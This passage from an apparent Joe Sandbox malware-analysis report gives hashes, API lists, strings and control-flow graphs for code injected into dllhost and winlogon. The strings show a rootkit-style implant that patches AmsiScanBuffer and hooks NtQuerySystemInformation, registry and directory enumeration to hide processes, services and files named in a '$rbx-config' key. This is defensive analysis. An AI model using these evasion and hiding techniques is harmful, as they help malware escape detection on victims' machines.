                                                  • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                  • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                  • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                  • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 401999c3e36310e097f8c7c9d2a6ca30bee2b2509ba70df11d7523c685e1944c
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: E6E0E571611A44AAE7289B62D90869D77A2FB88B15F88C078ED4D07321FE7C849A9A10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: b9756de02d6772dda66dcfeeef4bfb34adbf933ce8d1ddec5260dc544820a714
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: FEE0ED75A116849AEB189B62D90429D76A2FB88B25F48C038DD0907311FE78849A9610
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                  • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                  • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                  • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$Enumerate
                                                  • String ID:
                                                  • API String ID: 3520290360-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 1ca7d1e6270-1ca7d1e6297 152 1ca7d1e6299-1ca7d1e62a8 151->152 153 1ca7d1e62ab-1ca7d1e62b6 GetCurrentThreadId 151->153 152->153 154 1ca7d1e62b8-1ca7d1e62bd 153->154 155 1ca7d1e62c2-1ca7d1e62c9 153->155 156 1ca7d1e66ef-1ca7d1e6706 call 1ca7d1e8070 154->156 157 1ca7d1e62db-1ca7d1e62ef 155->157 158 1ca7d1e62cb-1ca7d1e62d6 call 1ca7d1e60a0 155->158 161 1ca7d1e62fe-1ca7d1e6304 157->161 158->156 162 1ca7d1e63d5-1ca7d1e63f6 161->162 163 1ca7d1e630a-1ca7d1e6313 161->163 171 1ca7d1e655f-1ca7d1e6570 call 1ca7d1e7bff 162->171 172 1ca7d1e63fc-1ca7d1e641c GetThreadContext 162->172 166 1ca7d1e6315-1ca7d1e6358 call 1ca7d1f3a40 163->166 167 1ca7d1e635a-1ca7d1e63cd call 1ca7d1e4c50 call 1ca7d1e4bf0 call 1ca7d1e4bb0 163->167 180 1ca7d1e63d0 166->180 167->180 183 1ca7d1e6575-1ca7d1e657b 171->183 173 1ca7d1e6422-1ca7d1e6443 172->173 174 1ca7d1e655a 172->174 173->174 182 1ca7d1e6449-1ca7d1e6452 173->182 174->171 180->161 186 1ca7d1e6454-1ca7d1e6465 182->186 187 1ca7d1e64d2-1ca7d1e64e3 182->187 188 1ca7d1e6581-1ca7d1e65d8 VirtualProtect FlushInstructionCache 183->188 189 1ca7d1e663e-1ca7d1e664e 183->189 191 1ca7d1e6467-1ca7d1e647c 186->191 192 1ca7d1e64cd 186->192 195 1ca7d1e6555 187->195 196 1ca7d1e64e5-1ca7d1e6503 187->196 193 1ca7d1e6609-1ca7d1e6639 call 1ca7d1e7fdc 188->193 194 1ca7d1e65da-1ca7d1e65e4 188->194 198 1ca7d1e6650-1ca7d1e6657 189->198 199 1ca7d1e665e-1ca7d1e666a call 1ca7d1e5530 189->199 191->192 202 1ca7d1e647e-1ca7d1e64c8 call 1ca7d1e40b0 SetThreadContext 191->202 192->195 193->183 194->193 203 1ca7d1e65e6-1ca7d1e6601 call 1ca7d1e4ad0 194->203 196->195 204 1ca7d1e6505-1ca7d1e6550 call 1ca7d1e4040 call 1ca7d1e7c1d 196->204 198->199 200 1ca7d1e6659 call 1ca7d1e4b20 198->200 212 1ca7d1e666f-1ca7d1e6675 199->212 200->199 202->192 203->193 204->195 216 1ca7d1e66b7-1ca7d1e66d5 212->216 217 1ca7d1e6677-1ca7d1e66b5 ResumeThread call 1ca7d1e7fdc 212->217 220 1ca7d1e66e9 216->220 221 1ca7d1e66d7-1ca7d1e66e6 216->221 217->212 220->156 221->220
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                                  • Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
                                                  • Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                                  • Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 1ca7d1e1e3c-1ca7d1e1e60 LoadLibraryA GetProcAddress 224 1ca7d1e1e62-1ca7d1e1e6d SleepEx 223->224 225 1ca7d1e1e6f-1ca7d1e1e73 223->225 224->224
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 1ca7d1e5810-1ca7d1e583c 227 1ca7d1e583e-1ca7d1e5846 226->227 228 1ca7d1e584d-1ca7d1e5856 226->228 227->228 229 1ca7d1e5858-1ca7d1e5860 228->229 230 1ca7d1e5867-1ca7d1e5870 228->230 229->230 231 1ca7d1e5872-1ca7d1e587a 230->231 232 1ca7d1e5881-1ca7d1e588a 230->232 231->232 233 1ca7d1e5896-1ca7d1e58a1 GetCurrentThreadId 232->233 234 1ca7d1e588c-1ca7d1e5891 232->234 236 1ca7d1e58a3-1ca7d1e58a8 233->236 237 1ca7d1e58ad-1ca7d1e58b4 233->237 235 1ca7d1e5e13-1ca7d1e5e1a 234->235 236->235 238 1ca7d1e58b6-1ca7d1e58bc 237->238 239 1ca7d1e58c1-1ca7d1e58ca 237->239 238->235 240 1ca7d1e58d6-1ca7d1e58e2 239->240 241 1ca7d1e58cc-1ca7d1e58d1 239->241 242 1ca7d1e58e4-1ca7d1e5909 240->242 243 1ca7d1e590e-1ca7d1e5965 call 1ca7d1e5e20 * 2 240->243 241->235 242->235 248 1ca7d1e5967-1ca7d1e596e 243->248 249 1ca7d1e597a-1ca7d1e5983 243->249 250 1ca7d1e5976 248->250 251 1ca7d1e5970 248->251 252 1ca7d1e5995-1ca7d1e599e 249->252 253 1ca7d1e5985-1ca7d1e5992 249->253 255 1ca7d1e59e6-1ca7d1e59ea 250->255 254 1ca7d1e59f0-1ca7d1e59f6 251->254 256 1ca7d1e59b3-1ca7d1e59d8 call 1ca7d1e7fa0 252->256 257 1ca7d1e59a0-1ca7d1e59b0 252->257 253->252 258 1ca7d1e59f8-1ca7d1e5a14 call 1ca7d1e4ad0 254->258 259 1ca7d1e5a25-1ca7d1e5a2b 254->259 255->254 267 1ca7d1e59de 256->267 268 1ca7d1e5a6d-1ca7d1e5a82 call 1ca7d1e4400 256->268 257->256 258->259 269 1ca7d1e5a16-1ca7d1e5a1e 258->269 262 1ca7d1e5a55-1ca7d1e5a68 259->262 263 1ca7d1e5a2d-1ca7d1e5a4c call 1ca7d1e7fdc 259->263 262->235 263->262 267->255 273 1ca7d1e5a84-1ca7d1e5a8c 268->273 274 1ca7d1e5a91-1ca7d1e5a9a 268->274 269->259 273->255 275 1ca7d1e5aac-1ca7d1e5afa call 1ca7d1f40e0 274->275 276 1ca7d1e5a9c-1ca7d1e5aa9 274->276 279 1ca7d1e5b02-1ca7d1e5b0a 275->279 276->275 280 1ca7d1e5c17-1ca7d1e5c1f 279->280 281 1ca7d1e5b10-1ca7d1e5bfb call 1ca7d1e7b80 279->281 283 1ca7d1e5c63-1ca7d1e5c6b 280->283 284 1ca7d1e5c21-1ca7d1e5c34 call 1ca7d1e4cd0 280->284 292 1ca7d1e5bff-1ca7d1e5c0e call 1ca7d1e47a0 281->292 293 1ca7d1e5bfd 281->293 285 1ca7d1e5c77-1ca7d1e5c86 283->285 286 1ca7d1e5c6d-1ca7d1e5c75 283->286 295 1ca7d1e5c38-1ca7d1e5c61 284->295 296 1ca7d1e5c36 284->296 290 1ca7d1e5c88 285->290 291 1ca7d1e5c8f 285->291 286->285 289 1ca7d1e5c94-1ca7d1e5ca1 286->289 298 1ca7d1e5ca4-1ca7d1e5cf9 call 1ca7d1f3a40 289->298 299 1ca7d1e5ca3 289->299 290->291 291->289 302 1ca7d1e5c12 292->302 303 1ca7d1e5c10 292->303 293->280 295->280 296->283 305 1ca7d1e5d08-1ca7d1e5da1 call 1ca7d1e4c50 call 1ca7d1e4bb0 VirtualProtect 298->305 306 1ca7d1e5cfb-1ca7d1e5d03 298->306 299->298 302->279 303->280 311 1ca7d1e5da3-1ca7d1e5da8 GetLastError 305->311 312 1ca7d1e5db1-1ca7d1e5e11 305->312 311->312 312->235
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                                  • Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
                                                  • Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                                  • Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000003.2075272347.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
                                                  • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
                                                  • PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44
                                                    • Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0
                                                    • Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
                                                    • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
                                                    • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
                                                    • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
                                                    • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68
                                                  • CreateThread.KERNELBASE ref: 000001CA7D1E3A8B
                                                    • Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
                                                    • Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
